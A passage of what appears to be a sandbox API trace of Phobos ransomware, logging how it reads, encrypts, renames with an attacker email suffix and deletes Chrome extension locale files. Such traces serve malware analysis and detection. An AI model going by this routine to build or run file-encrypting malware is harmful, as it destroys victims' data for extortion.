(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json")) returned 0x2020 [0154.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.553] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.553] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.554] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.554] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.554] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x109, lpOverlapped=0x0) returned 1 [0154.555] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0154.555] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0154.556] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0154.556] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.556] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.556] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.556] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.556] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.556] CloseHandle (hObject=0x14c) returned 1 [0154.556] CloseHandle (hObject=0x130) returned 1 [0154.556] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json")) returned 1 [0154.630] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.631] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=187) returned 1 [0154.631] CloseHandle (hObject=0x18c) returned 1 [0154.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json")) returned 0x2020 [0154.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.631] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.631] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.632] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0154.632] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.632] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xbb, lpOverlapped=0x0) returned 1 [0154.632] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0154.633] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0154.633] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0154.633] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.633] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.633] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.633] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.633] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.633] CloseHandle (hObject=0x18c) returned 1 [0154.634] CloseHandle (hObject=0x194) returned 1 [0154.634] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json")) returned 1 [0154.636] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.636] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=210) returned 1 [0154.636] CloseHandle (hObject=0x194) returned 1 [0154.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json")) returned 0x2020 [0154.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.637] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.637] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.638] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0154.638] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.638] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd2, lpOverlapped=0x0) returned 1 [0154.639] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0154.639] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0154.639] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0154.639] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.639] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.639] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.640] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.640] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.640] CloseHandle (hObject=0x194) returned 1 [0154.640] CloseHandle (hObject=0x18c) returned 1 [0154.640] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json")) returned 1 [0154.642] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.642] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=172) returned 1 [0154.642] CloseHandle (hObject=0x18c) returned 1 [0154.642] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json")) returned 0x2020 [0154.642] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.642] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.642] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.643] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0154.643] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.643] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xac, lpOverlapped=0x0) returned 1 [0154.644] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0154.644] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0154.644] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0154.644] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.644] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.644] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.645] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.645] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.645] CloseHandle (hObject=0x18c) returned 1 [0154.645] CloseHandle (hObject=0x194) returned 1 [0154.645] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json")) returned 1 [0154.646] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.647] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=286) returned 1 [0154.647] CloseHandle (hObject=0x194) returned 1 [0154.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json")) returned 0x2020 [0154.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.647] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.647] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, 